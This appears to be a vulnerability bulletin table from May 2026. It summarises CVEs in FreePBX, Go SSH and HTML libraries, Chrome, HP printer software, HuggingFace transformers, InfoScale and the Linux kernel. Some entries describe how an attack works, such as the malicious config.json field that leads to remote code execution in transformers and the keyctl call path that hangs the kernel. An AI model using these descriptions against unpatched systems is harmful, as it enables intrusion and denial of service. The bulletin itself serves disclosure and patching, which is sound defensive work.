| FreePBX--security-reporting | FreePBX is an open source IP PBX. In versions below 16.0.71 and 17.0.6, the backup module does not properly sanitize data during restore operations, potentially leading to compromise if the backup contains carefully crafted hostile data. During backup restore operations, FreePBX extracts selected files from a user-supplied tar archive. If a malicious file exists in the archive, it is read and passed directly to unserialize() without validation, class restrictions, or integrity checks. This issue allows Remote Code Execution during restoration of the backup as the web server user (typically asterisk or www-data). The attack does not require shell access, CLI access, or filesystem write permissions beyond the normal restore workflow. Authentication with a known username that has sufficient access permissions and/or write access to backup files is required. This issue has been fixed in versions 16.0.71 and 17.0.6. | 2026-05-18 | not yet calculated | CVE-2026-26978 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-5v7h-49gr-jcwr https://github.com/FreePBX/backup/commit/45c57e1207cbf9fd1c5f76f8a3e72d204a69a472 https://github.com/FreePBX/backup/commit/64781af5c80cce0cff21a981be4d8e6a7a71f2c4 |
| glpi-project--glpi | GLPI is a free asset and IT management software package. In versions 11.0.0 through 11.0.6, an authenticated user with forms READ permission can export the structure of unauthorized forms. This issue has been fixed in version 11.0.7. | 2026-05-18 | not yet calculated | CVE-2026-32312 | https://github.com/glpi-project/glpi/security/advisories/GHSA-cg63-qchq-q626 https://github.com/glpi-project/glpi/releases/tag/11.0.7 |
| goauthentik--authentik | authentik is an open-source identity provider. In versions prior to 2025.12.5 and 2026.2.0-rc1 through 2026.2.2, authenticated non-admin users with at least one OAuth2 access token can retrieve the client_secret of confidential OAuth2 providers they have previously authenticated against, exposing sensitive information to users without the correct permissions. This logic is GET /api/v3/oauth2/access_tokens/. The API response includes a nested provider object containing client_id and client_secret for providers configured with client_type: confidential, which should not be accessible to low-privilege users. This issue has been fixed in versions 2025.12.5 and 2026.2.3. | 2026-05-22 | not yet calculated | CVE-2026-40166 | https://github.com/goauthentik/authentik/security/advisories/GHSA-hhpc-rqgm-pxj4 https://github.com/goauthentik/authentik/releases/tag/version%2F2025.12.5 https://github.com/goauthentik/authentik/releases/tag/version%2F2026.2.3 |
| gohttp--gohttp | An issue in gohttp commit 34ea51 allows attackers to execute a directory traversal via supplying a crafted request. | 2026-05-19 | not yet calculated | CVE-2025-70950 | https://github.com/itang/gohttp/issues/13 https://gist.github.com/Lime-Cocoa/202127ae5f4dcc4b39909ce7ac1c8466 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | An authenticated SSH client that repeatedly opened channels which were rejected by the server caused unbounded memory growth, eventually crashing the server process and affecting all connected users. Rejected channels are now properly removed from the connection's internal state and released for garbage collection. | 2026-05-22 | not yet calculated | CVE-2026-39827 | https://go.dev/issue/35127 https://go.dev/cl/781320 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5016 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | When an SSH server authentication callback returned PartialSuccessError with non-nil Permissions, those permissions were silently discarded, potentially dropping certificate restrictions such as force-command after a second factor succeeded. Returning non-nil Permissions with PartialSuccessError now results in a connection error. | 2026-05-22 | not yet calculated | CVE-2026-39828 | https://go.dev/issue/79562 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781621 https://pkg.go.dev/vuln/GO-2026-5014 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | The RSA and DSA public key parsers did not enforce size limits on key parameters. A crafted public key with an excessively large modulus or DSA parameter could cause several minutes of CPU consumption during signature verification. This could be triggered by unauthenticated clients during public key authentication. RSA moduli are now limited to 8192 bits, and DSA parameters are validated per FIPS 186-2. | 2026-05-22 | not yet calculated | CVE-2026-39829 | https://go.dev/issue/79565 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781641 https://go.dev/cl/781661 https://pkg.go.dev/vuln/GO-2026-5018 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | A malicious SSH peer could send unsolicited global request responses to fill an internal buffer, blocking the connection's read loop. The blocked goroutine could not be released by calling Close(), resulting in a resource leak per connection. Unsolicited global responses are now discarded. | 2026-05-22 | not yet calculated | CVE-2026-39830 | https://go.dev/issue/79564 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781640 https://go.dev/cl/781664 https://pkg.go.dev/vuln/GO-2026-5017 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | The Verify() method for FIDO/U2F security key types (sk-ecdsa-sha2-nistp256@openssh.com, sk-ssh-ed25519@openssh.com) did not check the User Presence flag. Signatures generated without physical touch were accepted, allowing unattended use of a hardware security key. To restore the previous behavior, return a "no-touch-required" extension in Permissions.Extensions from PublicKeyCallback. | 2026-05-22 | not yet calculated | CVE-2026-39831 | https://go.dev/issue/79566 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781662 https://pkg.go.dev/vuln/GO-2026-5019 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | When writing data larger than 4GB in a single Write call on an SSH channel, an integer overflow in the internal payload size calculation caused the write loop to spin indefinitely, sending empty packets without making progress. The size comparison now uses int64 to prevent truncation. | 2026-05-22 | not yet calculated | CVE-2026-39834 | https://go.dev/issue/79567 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781663 https://pkg.go.dev/vuln/GO-2026-5020 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | SSH servers which use CertChecker as a public key callback without setting IsUserAuthority or IsHostAuthority could be caused to panic by a client presenting a certificate. CertChecker now returns an error instead of panicking when these callbacks are nil. | 2026-05-22 | not yet calculated | CVE-2026-39835 | https://go.dev/issue/79563 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781660 https://pkg.go.dev/vuln/GO-2026-5015 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | Previously, CVE-2024-45337 fixed an authorization bypass for misused ssh server configurations; if any other type of callback is passed other than public key, then the source-address validation would be skipped. | 2026-05-22 | not yet calculated | CVE-2026-46595 | https://go.dev/issue/79570 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781642 https://pkg.go.dev/vuln/GO-2026-5023 |
| golang.org/x/crypto--golang.org/x/crypto/ssh | An incorrectly placed cast from bytes to int allowed for server-side panic in the AES-GCM packet decoder for well-crafted inputs. | 2026-05-22 | not yet calculated | CVE-2026-46597 | https://go.dev/issue/79561 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://go.dev/cl/781620 https://pkg.go.dev/vuln/GO-2026-5013 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | When adding a key to a remote agent constraint extensions such as restrict-destination-v00@openssh.com were not serialized in the request. Destination restrictions were silently stripped when forwarding keys, allowing unrestricted use of the key on the remote host. The client now serializes all constraint extensions. Additionally, the in-memory keyring returned by NewKeyring() now rejects keys with unsupported constraint extensions instead of silently ignoring them. | 2026-05-22 | not yet calculated | CVE-2026-39832 | https://go.dev/issue/79435 https://go.dev/cl/778642 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5006 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | The in-memory keyring returned by NewKeyring() silently accepted keys with the ConfirmBeforeUse constraint but never enforced it. The key would sign without any confirmation prompt, with no indication to the caller that the constraint was not in effect. NewKeyring() now returns an error when unsupported constraints are requested. | 2026-05-22 | not yet calculated | CVE-2026-39833 | https://go.dev/issue/79436 https://go.dev/cl/778640 https://go.dev/cl/778641 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5005 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/agent | For certain crafted inputs, a 'ed25519.PrivateKey' was created by casting malformed wire bytes, leading to a panic when used. | 2026-05-22 | not yet calculated | CVE-2026-46598 | https://go.dev/issue/79596 https://go.dev/cl/781360 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5033 |
| golang.org/x/crypto--golang.org/x/crypto/ssh/knownhosts | Previously, a revoked 'SignatureKey' belonging to a CA was not correctly checked for revocation. Now, both the 'key' and 'key.SignatureKey' are checked for @revoked. | 2026-05-22 | not yet calculated | CVE-2026-42508 | https://go.dev/issue/79568 https://go.dev/cl/781220 https://groups.google.com/g/golang-announce/c/a082jnz-LvI https://pkg.go.dev/vuln/GO-2026-5021 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML can consume excessive CPU time, possibly leading to denial of service. | 2026-05-22 | not yet calculated | CVE-2026-25680 | https://go.dev/cl/781702 https://go.dev/issue/79573 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5028 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-25681 | https://go.dev/issue/79574 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781703 https://pkg.go.dev/vuln/GO-2026-5029 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-27136 | https://go.dev/issue/79575 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781685 https://pkg.go.dev/vuln/GO-2026-5030 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42502 | https://go.dev/issue/79572 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781701 https://pkg.go.dev/vuln/GO-2026-5027 |
| golang.org/x/net--golang.org/x/net/html | Parsing arbitrary HTML which is then rendered using Render can result in an unexpected HTML tree. This can be leveraged to execute XSS attacks in applications that attempt to sanitize input HTML before rendering. | 2026-05-22 | not yet calculated | CVE-2026-42506 | https://go.dev/issue/79571 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://go.dev/cl/781700 https://pkg.go.dev/vuln/GO-2026-5025 |
| golang.org/x/net--golang.org/x/net/idna | The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode("xn--example-.com") incorrectly returns the name "example.com" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject "example.com" but permit "xn--example-.com". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name "example.com". | 2026-05-22 | not yet calculated | CVE-2026-39821 | https://go.dev/cl/767220 https://go.dev/issue/78760 https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8 https://pkg.go.dev/vuln/GO-2026-5026 |
| golang.org/x/sys--golang.org/x/sys/windows | NewNTUnicodeString does not check for string length overflow. When provided with a string that overflows the maximum size of a NTUnicodeString (a 16-bit number of bytes), it returns a truncated string rather than an error. | 2026-05-22 | not yet calculated | CVE-2026-39824 | https://go.dev/issue/78916 https://go.dev/cl/770080 https://groups.google.com/g/golang-announce/c/6MMI8Lj-Atg https://pkg.go.dev/vuln/GO-2026-5024 |
| Google--Chrome | Inappropriate implementation in UI in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to perform UI spoofing via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9110 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/503551154 |
| Google--Chrome | Use after free in WebRTC in Google Chrome on Linux prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-20 | not yet calculated | CVE-2026-9111 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504551032 |
| Google--Chrome | Use after free in GPU in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9112 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489791425 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9113 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489585044 |
| Google--Chrome | Use after free in QUIC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9114 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495798630 |
| Google--Chrome | Insufficient policy enforcement in Service Worker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9115 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495999481 |
| Google--Chrome | Insufficient policy enforcement in ServiceWorker in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9116 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497436273 |
| Google--Chrome | Type Confusion in GFX in Google Chrome on Linux, ChromeOS prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted video file. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9117 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/497542537 |
| Google--Chrome | Use after free in XR in Google Chrome on Windows prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9118 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/498702233 |
| Google--Chrome | Heap buffer overflow in WebRTC in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9119 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/502661101 |
| Google--Chrome | Use after free in WebRTC in Google Chrome prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-20 | not yet calculated | CVE-2026-9120 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/504620824 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9121 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/488064108 |
| Google--Chrome | Out of bounds read in GPU in Google Chrome on Mac prior to 148.0.7778.179 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9122 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/489579953 |
| Google--Chrome | Heap buffer overflow in Chromecast in Google Chrome on Android, Linux, ChromeOS prior to 148.0.7778.179 allowed a local attacker to execute arbitrary code inside a sandbox via malicious network traffic. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9123 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/495988507 |
| Google--Chrome | Insufficient validation of untrusted input in Input in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9124 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496375695 |
| Google--Chrome | Use after free in DOM in Google Chrome on prior to 148.0.7778.179 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-20 | not yet calculated | CVE-2026-9126 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0841193308.html https://issues.chromium.org/issues/496280532 |
| HP Inc--HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via an integer overflow in the hpcups processing path when handling crafted print data. | 2026-05-20 | not yet calculated | CVE-2026-8631 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP Inc--HP Linux Imaging and Printing Software | A potential security vulnerability has been identified in the HP Linux Imaging and Printing Software. This potential vulnerability may allow escalation of privileges and/or arbitrary code execution via operating system command injection. | 2026-05-20 | not yet calculated | CVE-2026-8632 | https://support.hp.com/us-en/document/ish_14942099-14942126-16/hpsbpi04118 |
| HP-- ENVY 5000 | HP ENVY 5000 series printers VERBASPP1N003.2237A.00 do not properly manage concurrent TCP connections to port 9100 (JetDirect/RAW printing). An unauthenticated remote attacker on the same network can establish a persistent connection to port 9100 and send keep-alive packets, causing the printer's session threads to remain locked in a waiting state. The firmware lacks connection timeouts and concurrent session limits, resulting in a persistent Denial of Service (DoS) that renders the printer unresponsive to all user commands and print jobs. Physical intervention (manual restart) is required to restore functionality, and the attack can be immediately re-initiated. | 2026-05-22 | not yet calculated | CVE-2026-42626 | https://medium.com/@jacobmasse/hp-envy-5000-printer-dos-vulnerability-8cae52c87b41 |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Local File Inclusion (LFI) vulnerability caused by improper control of user-supplied file paths. The endpoint /vendor/phpunit/phpunit.php processes user-controlled parameters that directly affect file access operations without adequate validation, sanitization, or path restriction. This allows a remote attacker to exploit Path Traversal techniques to read arbitrary files from the underlying operating system and application directories, leading to sensitive information disclosure. | 2026-05-18 | not yet calculated | CVE-2026-29962 | https://github.com/sql3t0/cve-disclosures https://hsclabs.com/pt-br/mailinspector https://github.com/sql3t0/cve-disclosures/blob/main/01_-_CVE-2026-29962_LFI%2BPath_Traversal.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 has a Path Traversal vulnerability due to improper validation of user-supplied input in the /tap/dw.php endpoint. The text parameter is used to construct file paths without adequate normalization or restriction to a safe base directory. A remote attacker can exploit this flaw to access arbitrary files on the underlying operating system, resulting in unauthorized disclosure of sensitive information. | 2026-05-18 | not yet calculated | CVE-2026-29963 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/02_-_CVE-2026-29963_LFI%2BPath_Traversal.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector v5.3.3-7 contains a Cross-Site Scripting (XSS) vulnerability in the /tap/tap.php endpoint due to improper neutralization of user-controlled input using alternate or obfuscated JavaScript syntax. The endpoint reflects unsanitized user input in HTTP responses without adequate output encoding, allowing a remote attacker to execute arbitrary JavaScript code in the context of a victim's browser. | 2026-05-18 | not yet calculated | CVE-2026-29964 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/03_-_CVE-2026-29964_XSS.md |
| HSC--MailInspector v5.3.3-7 | HSC MailInspector 5.3.3-7 is vulnerable to Cross Site Scripting (XSS) in the /police/WarningUrlPage.php endpoint due to improper neutralization of user-supplied input that uses alternate or obfuscated JavaScript syntax. | 2026-05-18 | not yet calculated | CVE-2026-29965 | https://hsclabs.com/pt-br/mailinspector/ https://github.com/sql3t0/cve-disclosures https://github.com/sql3t0/cve-disclosures/blob/main/04_-_CVE-2026-29965_XSS.md |
| huggingface--huggingface/transformers | A critical remote code execution vulnerability exists in all versions of the HuggingFace transformers library prior to version 5.3.0. The vulnerability allows an attacker to craft a malicious `config.json` file containing the `_attn_implementation_internal` field set to an attacker-controlled HuggingFace Hub repository ID. When a victim loads this model using the standard `AutoModelForCausalLM.from_pretrained()` API, the library downloads and executes arbitrary Python code from the attacker's repository with the victim's full OS privileges. This issue arises due to unfiltered deserialization of configuration attributes, insufficient sanitization of internal fields, and unsandboxed execution of downloaded kernels. The vulnerability bypasses the `trust_remote_code` security mechanism, is invisible to the victim, and exploits the standard documented usage pattern, making it particularly severe. Users are advised to upgrade to version 5.3.0 or later to mitigate this issue. | 2026-05-24 | not yet calculated | CVE-2026-4372 | https://huntr.com/bounties/1f693a6e-6836-4b8b-a0bd-ca036fba8884 https://github.com/huggingface/transformers/commit/a7f8e7ff37d87d1a1a0c8cf607971c607741452f |
| InfoScale--CmdServer | InfoScale CmdServer before 7.4.2 mishandles access control. | 2026-05-20 | not yet calculated | CVE-2026-44926 | https://www.veritas.com/support/en_US/doc/109864724-141543588-0/v141217547-141543588 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766081&articleTitle=InfoScale_Command_Server_Security_Bulletin_for_CVE_2026_44926 |
| InfoScale--VIOM | SQL injection in InfoScale VIOM before v9.1.3 allows remote attackers to escalate privileges. | 2026-05-20 | not yet calculated | CVE-2026-44923 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale--VIOM | InfoScale VIOM 9.1.3 allows XSS. | 2026-05-20 | not yet calculated | CVE-2026-44924 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| InfoScale--VIOM | Cross-Site Request Forgery (CSRF) vulnerability in InfoScale v.9.1.3 Operations Manager (VIOM) allows an attacker to force the user with an active session into clicking a malicious HTML link, which triggers unintended modifications on VIOM web application without the user's knowledge. | 2026-05-20 | not yet calculated | CVE-2026-44925 | https://www.veritas.com/support/en_US/doc/120571566-166757640-0/viom_tot_v118836641-166757640 https://supportinfoscale.cloud.com/support-home/kbsearch/article?articleNumber=1000766080&articleTitle=InfoScale_Operations_Manager_IOM_web_application_Security_Bulletin_for_CVE_2026_44923_CVE_2026_44924_and_CVE_2026_44925 |
| Innoshop--Innoshop 0.6.0 | An authorization vulnerability exists in Innoshop 0.6.0. After logging into the frontend, an attacker can directly access backend application interfaces, leading to further dangerous operations. | 2026-05-19 | not yet calculated | CVE-2026-39250 | https://www.innoshop.com/ https://gist.github.com/hkdmh/4af513ea7589212cb1d49bc5d972972e |
| Jaspersoft--JasperReports Library Community Edition | Java Deserialisation Vulnerability in Jaspersoft Reports Library leads to Remote Code Execution (RCE), potentially allowing code execution on the affected system | 2026-05-19 | not yet calculated | CVE-2026-6009 | https://community.jaspersoft.com/advisories/jaspersoft-security-advisory-may-19-2026-jaspersoft-library-cve-2026-6009-r11/ |
| JJNAPIORK--Catalyst::Plugin::Authentication | Catalyst::Plugin::Authentication versions through 0.10024 for Perl is susceptible to timing attacks. These versions use Perl's built-in eq comparison. Discrepencies in timing could be used to guess the underlying hash or password. | 2026-05-21 | not yet calculated | CVE-2026-5091 | https://metacpan.org/release/ETHER/Catalyst-Plugin-Authentication-0.10_025/changes https://github.com/perl-catalyst/Catalyst-Plugin-Authentication/commit/b0515f492257438cf07082acf1e10d06e8088a5e.patch |
| LalanaChami--Pharmacy Management System | The LalanaChami Pharmacy Management System (commit 5c3d028) allows unauthenticated remote attackers to escalate privileges by self-assigning an administrative role during registration. The /api/user/signup endpoint fails to validate the role parameter in the request body | 2026-05-19 | not yet calculated | CVE-2026-31070 | https://github.com/LalanaChami/Pharmacy-Mangment-System/blob/5c3d02888631166649856f71d542387114b3010b/backend/routes/user.js#L16 https://gist.github.com/nedlir/22bf6d1a3a07209be3e343744bc81d51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: qrtr: ns: Limit the maximum server registration per node Current code does no bound checking on the number of servers added per node. A malicious client can flood NEW_SERVER messages and exhaust memory. Fix this issue by limiting the maximum number of server registrations to 256 per node. If the NEW_SERVER message is received for an old port, then don't restrict it as it will get replaced. While at it, also rate limit the error messages in the failure path of qrtr_ns_worker(). Note that the limit of 256 is chosen based on the current platform requirements. If requirement changes in the future, this limit can be increased. | 2026-05-19 | not yet calculated | CVE-2026-43491 | https://git.kernel.org/stable/c/e6f6cd501fb54060940a6eb3f4103eeb5e426ae7 https://git.kernel.org/stable/c/3efaad55cad1ded429e3a873bfece389058a526b https://git.kernel.org/stable/c/35fb4a0c077c5d1049c2628b769e0a1b1e65df0d https://git.kernel.org/stable/c/868202aa2adae427060a42d5bd663b4d782ec02c https://git.kernel.org/stable/c/d5ee2ff98322337951c56398e79d51815acbf955 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib/crypto: mpi: Fix integer underflow in mpi_read_raw_from_sgl() Yiming reports an integer underflow in mpi_read_raw_from_sgl() when subtracting "lzeros" from the unsigned "nbytes". For this to happen, the scatterlist "sgl" needs to occupy more bytes than the "nbytes" parameter and the first "nbytes + 1" bytes of the scatterlist must be zero. Under these conditions, the while loop iterating over the scatterlist will count more zeroes than "nbytes", subtract the number of zeroes from "nbytes" and cause the underflow. When commit 2d4d1eea540b ("lib/mpi: Add mpi sgl helpers") originally introduced the bug, it couldn't be triggered because all callers of mpi_read_raw_from_sgl() passed a scatterlist whose length was equal to "nbytes". However since commit 63ba4d67594a ("KEYS: asymmetric: Use new crypto interface without scatterlists"), the underflow can now actually be triggered. When invoking a KEYCTL_PKEY_ENCRYPT system call with a larger "out_len" than "in_len" and filling the "in" buffer with zeroes, crypto_akcipher_sync_prep() will create an all-zero scatterlist used for both the "src" and "dst" member of struct akcipher_request and thereby fulfil the conditions to trigger the bug: sys_keyctl() keyctl_pkey_e_d_s() asymmetric_key_eds_op() software_key_eds_op() crypto_akcipher_sync_encrypt() crypto_akcipher_sync_prep() crypto_akcipher_encrypt() rsa_enc() mpi_read_raw_from_sgl() To the user this will be visible as a DoS as the kernel spins forever, causing soft lockup splats as a side effect. Fix it. | 2026-05-19 | not yet calculated | CVE-2026-43492 | https://git.kernel.org/stable/c/2aa77a18dc7f2670497fe3ee5acbeda0b57659e5 https://git.kernel.org/stable/c/26d3a97ad46c7a9226ec04d4bf35bd4998a97d16 https://git.kernel.org/stable/c/8637dfb4c1d8a7026ef681f2477c6de8b71c4003 https://git.kernel.org/stable/c/30e513e755bb381afce6fb57cdc8694136193f22 https://git.kernel.org/stable/c/8c2f1288250a90a4b5cabed5d888d7e3aeed4035 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/rds: reset op_nents when zerocopy page pin fails When iov_iter_get_pages2() fails in rds_message_zcopy_from_user(), the pinned pages are released with put_page(), and rm->data.op_mmp_znotifier is cleared. But we fail to properly clear rm->data.op_nents. Later when rds_message_purge() is called from rds_sendmsg() the cleanup loop iterates over the incorrectly non zero number of op_nents and frees them again. Fix this by properly resetting op_nents when it should be in rds_message_zcopy_from_user(). | 2026-05-21 | not yet calculated | CVE-2026-43494 | https://git.kernel.org/stable/c/9115669faedccdda100428e2d26fd0aac8c50799 https://git.kernel.org/stable/c/0bbbff00a15b1df2cac9014d6cf4b6890f473353 https://git.kernel.org/stable/c/640e37f58f991546a87540d067279c2c1fa9fe51 https://git.kernel.org/stable/c/290e833d1acb1093bc121fcdc97f5e6161157479 https://git.kernel.org/stable/c/e174929793195e0cd6a4adb0cad731b39f9019b4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: wwan: t7xx: validate port_count against message length in t7xx_port_enum_msg_handler t7xx_port_enum_msg_handler() uses the modem-supplied port_count field as a loop bound over port_msg->data[] without checking that the message buffer contains sufficient data. A modem sending port_count=65535 in a 12-byte buffer triggers a slab-out-of-bounds read of up to 262140 bytes. Add a sizeof(*port_msg) check before accessing the port message header fields to guard against undersized messages. Add a struct_size() check after extracting port_count and before the loop. In t7xx_parse_host_rt_data(), guard the rt_feature header read with a remaining-buffer check before accessing data_len, validate feat_data_len against the actual remaining buffer to prevent OOB reads and signed integer overflow on offset. Pass msg_len from both call sites: skb->len at the DPMAIF path after skb_pull(), and the validated feat_data_len at the handshake path. | 2026-05-21 | not yet calculated | CVE-2026-43495 | https://git.kernel.org/stable/c/f94450ce5053b36002995b72d1fa1db3bb08c5bf https://git.kernel.org/stable/c/9855e063e063158cc5bded576382599dc3133202 https://git.kernel.org/stable/c/2b56d7903ab804481f5233a259d5f341e9fd513c https://git.kernel.org/stable/c/dd4f4c93c1488d7100b9964f2da4c8b3c29652f1 https://git.kernel.org/stable/c/0e7c074cfcd9bd93765505f9eb8b42f03ed2a744 |
